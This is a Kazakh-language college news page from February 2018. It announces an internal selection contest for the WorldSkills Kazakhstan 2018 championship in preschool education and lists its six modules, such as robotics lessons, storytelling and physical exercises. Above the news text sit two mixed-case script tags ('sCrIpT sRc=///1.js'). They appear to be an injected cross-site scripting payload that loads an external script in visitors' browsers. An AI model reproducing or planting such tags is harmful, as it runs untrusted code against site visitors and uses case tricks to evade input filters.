<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.02.2018

2018 жылдың 1-2 ақпан аралағында «Мектепке дейінгі тәрбие және оқыту» құзыреттілігі бойынша өткізілетін WorldSkills Kazakstan – 2018  аймақтық чемпионатына қатысушыларды іріктеу мақсатында колледжішілік байқау өткізіледі. Байқауға оқу орнының «Мектепке дейінгі тәрбие және оқыту» мамандығының 11 студенті қатысады. WorldSkills Kazakstan – 2018 стандартының «Мектепке дейінгі тәрбие және оқыту» құзыреттілігі бойынша колледжішілік чемпионат кезеңдері төмендегідей:

1-модуль. Танымдық дамыту «Мектеп жасына дейінгі ересек топтағы балалармен мобильді планетарийде виртуалды саяхатты әзірлеу және өткізу».

2-модуль. «Көркемдік-эстетикалық дамыту» және «Ата-аналармен өзара қарым-қатынас»

«Білім беру процесінің барлық қатысушылары үшін мерекеге арналған ақпараттық-таныстыру тақтасын дайындау».

3-кіріктірілген модуль. Құрастыру және робот техникасы «Мектеп жасына дейінгі балалар үшін робот техникасы бойынша сабақты әзірлеу және жүргізу».

4-модуль. Тіл дамыту «Мәнерлеп оқу, кітаптың тұсаукесері».

5-модуль. Дене дамуы «Мектеп жасына дейінгі балалармен күндізгі ұйқыдан кейінгі дене жаттығуларын әзірлеу және енгізу»

6-модуль. Дамытушы дидактикалық ойындарды немесе АКТ жабдықтарын қолдана отырып балалардың шағын тобымен жүргізілетін ойындарды әзірлеу және өткізу. 1-2 кезеңдері колледж ішінде өткізіледі, ал 3-6 кезеңдері қаладағы №1 «Арман» бала бақшасында ұйымдастырылып өтеді.

Просмотров: 681


Пікір қосу



Деректерді қолтаңбаға қосу